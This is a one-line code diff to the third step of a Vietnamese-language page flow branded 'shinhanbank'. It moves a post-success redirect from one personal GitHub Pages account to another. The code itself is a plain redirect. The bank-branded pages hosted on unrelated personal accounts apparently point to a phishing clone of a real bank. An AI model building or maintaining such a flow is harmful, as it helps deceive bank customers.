--- a/pages/vi/step3.html
+++ b/pages/vi/step3.html
@@ -368,7 +368,7 @@ function showSuccess() {
         navigator.vibrate(200);
     }
     setTimeout(() => {
-        window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/step4.html';
+        window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/step4.html';
     }, 2000);
 }
 
